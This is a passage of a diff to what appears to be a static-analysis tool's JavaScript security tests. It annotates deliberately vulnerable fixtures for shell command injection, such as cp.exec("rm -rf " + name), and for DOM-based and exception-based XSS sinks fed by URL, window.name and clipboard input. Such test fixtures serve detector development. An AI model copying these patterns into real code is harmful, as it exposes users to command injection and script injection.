functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); -module.exports.arrToShell = function (cmd, arr) { +module.exports.arrToShell = function (cmd, arr) { // $ Source cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index f2e6b7672f89..e6b7a10bacf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -export default function (name) { - cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. +export default function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index 67890f50fe82..853e144a0d62 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 8a79d2d66a66..f28c157a5ead 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js index 820349c5c62f..505f4e7af78a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js @@ -3,6 +3,6 @@ const dispatch = { POST: require("./subsub"), }; -module.exports.foo = function (name, type) { +module.exports.foo = function (name, type) { // $ Source dispatch[type](name); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index bc9e51562033..b8da58006c7c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 8d4a8cac6d0a..5c933dceff32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,13 +1,13 @@ -this.addEventListener('message', function(event) { +this.addEventListener('message', function(event) { // $ Source document.write(event.data); // $ Alert }) -this.addEventListener('message', function({data}) { +this.addEventListener('message', function({data}) { // $ Source document.write(data); // $ Alert }) function test() { - function foo(x, event, y) { + function foo(x, event, y) { // $ Source document.write(x.data); document.write(event.data); // $ Alert document.write(y.data); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 1b186b7db6a4..14d645d32c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -10,6 +10,6 @@ angular.module('myApp', []) } }); -addEventListener('message', (ev) => { +addEventListener('message', (ev) => { // $ Source Cookie.set("unsafe", ev.data); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index 8cda29a4e952..0d9f2d9fad21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -7,7 +7,7 @@ function main() { document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert - let unsafeStyle = classNames.bind({foo: window.name}); + let unsafeStyle = classNames.bind({foo: window.name}); // $ Source document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); document.body.innerHTML = `Hello`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index abc11b06ea87..79970a0e1b77 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -5,7 +5,7 @@ function paste(e) { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('paste', (e) => { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getClipboardData(e: ClipboardEvent): Promise } if (e.clipboardData.types.includes('text/html')) { - const droppedHtml = e.clipboardData.getData('text/html'); + const droppedHtml = e.clipboardData.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); @@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise const { data, inputType, isComposing, dataTransfer } = e; if (!dataTransfer) return; - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index c84f169995cb..df6fd9f439f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -1,7 +1,7 @@ const d3 = require('d3'); function getTaint() { - return window.name; + return window.name; // $ Source } function doSomething() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 97363f790da1..20e71516a9f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -6,7 +6,7 @@ import dateformat from 'dateformat'; function main() { let time = new Date(); - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert @@ -27,7 +27,7 @@ import MomentAdapter from "@date-io/moment"; import DayJSAdapter from "@date-io/dayjs" function dateio() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const dateFns = new DateFnsAdapter(); const luxon = new LuxonAdapter(); @@ -43,7 +43,7 @@ function dateio() { import { DateTime } from "luxon"; function luxon() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert @@ -51,7 +51,7 @@ function luxon() { } function dateio2() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const moment = new MomentAdapter(); document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 2e3c92f36758..8371c4c49b91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -5,7 +5,7 @@ function drop(e) { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('drop', (e) => { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getDropData(e: DragEvent): Promise> { } if (e.dataTransfer.types.includes('text/html')) { - const droppedHtml = e.dataTransfer.getData('text/html'); + const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index f81f545809fa..d025ace184c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -1,5 +1,5 @@ function test() { - var tainted = document.location.search + var tainted = document.location.search // $ Source $(tainted); // OK - location.search starts with '?' $("body", tainted); @@ -15,7 +15,7 @@ function test() { elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert - let hash = window.location.hash; + let hash = window.location.hash; // $ Source $(hash); // OK - start with '#' $(hash.substring(1)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index f9958ea20999..ae373dd4ea96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -2,7 +2,7 @@ var express = require("express"); var app = express(); app.get("/some/path", function (req, res) { - const locale = req.param("locale"); + const locale = req.param("locale"); // $ Source const breadcrumbList = [ { "@type": "ListItem", diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 74c96fdae902..86b4c3e8d3cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -4,7 +4,7 @@ import jwt from "jsonwebtoken"; import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - var taint = req.param("wobble"); + var taint = req.param("wobble"); // $ Source jwt.verify(taint, 'my-secret-key', function (err, decoded) { new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index dcec3e388777..73088a45b5ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); @@ -23,7 +23,7 @@ function test() { } function badSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source function sanitizeBad(x) { return x; // No sanitization; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index b60ca27e0e47..69f66f07aa44 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -2,7 +2,7 @@ import { useRouter } from 'next/router' export default function Post(params) { const router = useRouter() - const { id } = router.query + const { id } = router.query // $ Source return ( <> @@ -22,8 +22,8 @@ export default function Post(params) { export async function getServerSideProps(context) { return { props: { - id: context.params.id || "", - q: context.query?.foobar || "", + id: context.params.id || "", // $ Source + q: context.query?.foobar || "", // $ Source } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 2e403f76ddae..432c9910a2d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -4,7 +4,7 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); + let tainted = req.param("code"); // $ Source ; // $ Alert ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 7bf77b18be10..2dbc2feb38fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -1,19 +1,19 @@ import { useState } from 'react'; function initialState() { - let [state, setState] = useState(window.name); + let [state, setState] = useState(window.name); // $ Source return
    ; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); - setState(window.name); + setState(window.name); // $ Source return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); - setState(() => window.name); + setState(() => window.name); // $ Source return
    ; // $ Alert } @@ -22,7 +22,7 @@ function setStateValueLazy() { setState(prev => { document.body.innerHTML = prev; // $ Alert }) - setState(() => window.name); + setState(() => window.name); // $ Source } function setStateValueSafe() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 3ece85044bb3..52ad850e0185 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -13,7 +13,7 @@ function escapeAttr(s) { } function test() { - var tainted = window.name; + var tainted = window.name; // $ Source var elt = document.createElement(); elt.innerHTML = "" + escapeHtml(tainted) + ""; elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // $ MISSING: Alert - not flagged - diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6ee44babf8bf..aadec44a9dfb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -1,6 +1,6 @@ (function() { - sessionStorage.setItem('session', document.location.search); - localStorage.setItem('local', document.location.search); + sessionStorage.setItem('session', document.location.search); // $ Source + localStorage.setItem('local', document.location.search); // $ Source $('myId').html(sessionStorage.getItem('session')); // $ Alert $('myId').html(localStorage.getItem('session')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a823a6ce004f..7b0e5c4be3a0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -8,6 +8,6 @@ function foo(x, y, z) { } function bar() { - const url = window.location.href; + const url = window.location.href; // $ Source foo('safe', url, 'safe'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index e1d26b45802d..0b181f836c46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -3,7 +3,7 @@ import ReactDOM from 'react-dom'; import ReactTooltip from 'react-tooltip'; function tooltips() { - const source = window.name; + const source = window.name; // $ Source return @@ -19,6 +19,6 @@ function MyElement(props) { } function useMyElement() { - const source = window.name; + const source = window.name; // $ Source return source} />; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index d57844a89f28..11adc4399376 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -3,7 +3,7 @@ "own goal": "backpass", "fumble": "feint" }; - var target = document.location.search + var target = document.location.search // $ Source var searchParams = new URLSearchParams(target.substring(1)); $('original-term').html(searchParams.get('term')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 34eae2dc6a5b..247fbe3315fb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,7 +1,7 @@ import * as lib from './trusted-types-lib'; const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert -policy1.createHTML(window.name); +policy1.createHTML(window.name); // $ Source const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); @@ -10,4 +10,4 @@ const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); -policy4.createHTML(window.name); +policy4.createHTML(window.name); // $ Source diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index 6fb538bd1c1b..7709e095601f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -11,7 +11,7 @@ function test() { $('
    '); $('
    '); - let params = (new URL(document.location)).searchParams; + let params = (new URL(document.location)).searchParams; // $ Source $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); @@ -21,10 +21,10 @@ function test() { function foo(target) { $('myId').html(target); // $ Alert } -foo(document.location.search); +foo(document.location.search); // $ Source function bar() { - return document.location.search; + return document.location.search; // $ Source } $('myId').html(bar()); // $ Alert @@ -50,12 +50,12 @@ $('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { $('myId').html(s); // $ Alert } -dangerouslySetInnerHtml(document.location.search); -dangerouslySetInnerHtml(document.location.search); +dangerouslySetInnerHtml(document.location.search); // $ Source +dangerouslySetInnerHtml(document.location.search); // $ Source $('myId').html(bar()); // $ Alert -[,document.location.search].forEach(function(x) { +[,document.location.search].forEach(function(x) { // $ Source if (x) $('myId').html(x); // $ Alert }); @@ -90,7 +90,7 @@ angular.module('myApp', []) }) function tst() { - var v = document.location.search.substr(1); + var v = document.location.search.substr(1); // $ Source document.write(v); // $ Alert @@ -129,7 +129,7 @@ function tst() { function angularJSServices() { angular.module('myApp', []) .factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) { - xssSinkService1(window.location.search); + xssSinkService1(window.location.search); // $ Source }]) .factory("xssSinkService1", function(){ return function(v){ $("
    ").html(v); } // $ Alert @@ -139,7 +139,7 @@ function angularJSServices() { $("
    ").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ - return function() { return window.location.search }; + return function() { return window.location.search }; // $ Source }) .factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) { @@ -158,14 +158,14 @@ function angularJSServices() { } function testDOMParser() { - var target = document.location.search + var target = document.location.search // $ Source var parser = new DOMParser(); parser.parseFromString(target, "application/xml"); // $ Alert } function references() { - var tainted = document.location.search; + var tainted = document.location.search; // $ Source document.body.innerHTML = tainted; // $ Alert @@ -178,7 +178,7 @@ function references() { } function react(){ - var tainted = document.location.search; + var tainted = document.location.search; // $ Source React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert @@ -266,7 +266,7 @@ function jqueryLocation() { function testCreateContextualFragment() { - var tainted = window.name; + var tainted = window.name; // $ Source var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); var documentFragment = range.createContextualFragment(tainted); // $ Alert @@ -282,14 +282,14 @@ function flowThroughPropertyNames() { function basicExceptions() { try { - throw location; + throw location; // $ Source } catch(e) { $("body").append(e); // $ Alert } try { try { - throw location + throw location // $ Source } finally {} } catch(e) { $("body").append(e); // $ Alert @@ -308,7 +308,7 @@ function test2() { } function getTaintedUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } function URLPseudoProperties() { @@ -322,21 +322,21 @@ function URLPseudoProperties() { function hash() { function getUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } $(getUrl().hash.substring(1)); // $ Alert } function growl() { - var target = document.location.search + var target = document.location.search // $ Source $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { - var target = document.location.search + var target = document.location.search // $ Source this.html(target); // $ Alert - this is a jQuery object this.innerHTML = target // OK - this is a jQuery object @@ -352,7 +352,7 @@ function thisNodes() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -361,7 +361,7 @@ function test() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target); // $ Alert @@ -371,7 +371,7 @@ function test() { target.taint2 = 2; $('myId').html(target.taint2); - target.taint3 = document.location.search; + target.taint3 = document.location.search; // $ Source $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 @@ -396,10 +396,10 @@ function test() { } function hash2() { - var payload = window.location.hash.substr(1); + var payload = window.location.hash.substr(1); // $ Source document.write(payload); // $ Alert - let match = window.location.hash.match(/hello (\w+)/); + let match = window.location.hash.match(/hello (\w+)/); // $ Source if (match) { document.write(match[1]); // $ Alert } @@ -408,7 +408,7 @@ function hash2() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert @@ -416,7 +416,7 @@ function nonGlobalSanitizer() { } function mootools(){ - var source = document.location.search; + var source = document.location.search; // $ Source new Element("div"); new Element("div", {text: source}); @@ -433,14 +433,14 @@ const Convert = require('ansi-to-html'); const ansiToHtml = new Convert(); function ansiToHTML() { - var source = document.location.search; + var source = document.location.search; // $ Source $("#foo").html(source); // $ Alert $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { - var source = document.location.search; + var source = document.location.search; // $ Source let table = document.getElementById('mytable'); table.innerHTML = source; // $ Alert @@ -451,7 +451,7 @@ function domMethods() { } function urlStuff() { - var url = document.location.search.substr(1); + var url = document.location.search.substr(1); // $ Source $("", {href: url}).appendTo("body"); // $ Alert $("#foo").attr("href", url); // $ Alert @@ -488,7 +488,7 @@ function Foo() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index 16932da72c05..eb1074a5a62f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js @@ -1,5 +1,5 @@ var foo = document.getElementById("foo"); -var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); +var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source foo.setAttribute("src", data.src); // $ Alert foo.setAttribute("HREF", data.p); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index a1302d196a7f..a3694f3cf79e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -17,7 +17,7 @@ { name: 'dashboards', source: function (query, cb) { - var target = document.location.search + var target = document.location.search // $ Source cb(target); }, templates: { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index 957fe1ba0497..866636f07c18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,5 +1,5 @@ function test() { - let tainted = document.location.search; + let tainted = document.location.search; // $ Source $("
    " + tainted + "
    "); // $ Alert $(`
    ${tainted}
    `); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js index f52cb62735fb..5d2b25bed092 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js @@ -1,5 +1,5 @@ function test(elt) { - var tainted = document.location.search.substring(1); + var tainted = document.location.search.substring(1); // $ Source WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index f8a3d5c09486..c330177d56a3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -1,5 +1,5 @@ (function () { - var foo = document.location; + var foo = document.location; // $ Source function inner(x) { unknown(x); @@ -114,7 +114,7 @@ var app = express(); app.get('/user/:id', function (req, res) { try { - unknown(req.params.id); + unknown(req.params.id); // $ Source } catch (e) { res.send("Exception: " + e); // $ Alert } @@ -122,7 +122,7 @@ app.get('/user/:id', function (req, res) { (function () { - sessionStorage.setItem('exceptionSession', document.location.search); + sessionStorage.setItem('exceptionSession', document.location.search); // $ Source try { unknown(sessionStorage.getItem('exceptionSession')); @@ -133,7 +133,7 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { 